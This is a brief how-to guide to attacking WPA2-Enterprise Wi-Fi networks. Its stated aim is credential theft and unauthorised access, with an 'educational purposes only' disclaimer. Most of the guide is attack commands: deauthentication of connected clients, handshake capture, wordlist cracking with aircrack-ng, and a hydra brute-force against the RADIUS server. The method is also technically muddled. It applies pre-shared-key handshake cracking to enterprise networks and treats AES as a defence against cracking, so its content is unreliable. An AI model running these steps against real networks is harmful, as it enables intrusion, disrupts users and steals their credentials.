WPA2 Enterprise WiFi Hacking

TL;DR

This guide explains how to steal credentials from a WPA2-Enterprise RADIUS wifi network, allowing you to gain unauthorised access. Warning: This is illegal without explicit permission. Use this information for educational purposes only and on networks you own or have permission to test.

Prerequisites

• A wireless adapter capable of monitor mode (Alfa adapters are popular).
• Kali Linux (or a similar penetration testing distribution).
• Basic understanding of the command line.
• aircrack-ng suite installed.

Steps

1. Put your wireless adapter into monitor mode: This allows it to capture all wifi traffic, not just traffic for networks you’re connected to.

   sudo airmon-ng start wlan0

   This will likely create a new interface like wlan0mon. Use this interface in subsequent steps.

2. Identify the target network: Use airodump-ng to scan for nearby networks and find your target WPA2-Enterprise network.

   sudo airodump-ng wlan0mon

   Note the BSSID (MAC address) of the access point and the channel it’s on.

3. Capture handshake: Airodump-ng will automatically capture packets. To speed up the process, you can deauthenticate a connected client.

   sudo aireplay-ng -0 1 -a [BSSID] -c [Client MAC Address] wlan0mon

   Replace [BSSID] with the access point’s BSSID and [Client MAC Address] with a connected client’s MAC address. The goal is to capture an EAPOL handshake.

4. Crack the handshake: Once you have the handshake file (.cap), use aircrack-ng to attempt cracking it.

   sudo aircrack-ng -w /path/to/wordlist.txt [handshake_file].cap

   Replace /path/to/wordlist.txt with the path to your wordlist file (e.g., rockyou.txt) and [handshake_file].cap with the name of your captured handshake file.

5. RADIUS Dictionary Attack: WPA2-Enterprise often uses RADIUS authentication. If a standard dictionary attack fails, you may need to target the RADIUS server directly.
   • Identify RADIUS Server: Use tools like Wireshark or packet capture analysis during handshake capture to identify the RADIUS server’s IP address and port (typically UDP 1812/1813).
   • RADIUS Dictionary Attack Tools: Tools such as Medusa or hydra can be used for brute-force attacks against the RADIUS server. These tools require a username list and password list.

     hydra -l [username] -P /path/to/passwordlist.txt [radius_server_ip] radius

6. Post-Exploitation: If you successfully crack the password, you can connect to the wifi network using the obtained credentials.

Important Considerations

• Wordlists: The success of this attack heavily relies on having a good wordlist. Use large and relevant wordlists for best results.
• Network Security: Modern WPA2-Enterprise networks often employ additional security measures like stronger encryption (e.g., AES) and RADIUS server lockdown, making cracking more difficult.
• Legal Ramifications: Attempting to gain unauthorised access to a wifi network is illegal in most jurisdictions. This guide is for educational purposes only.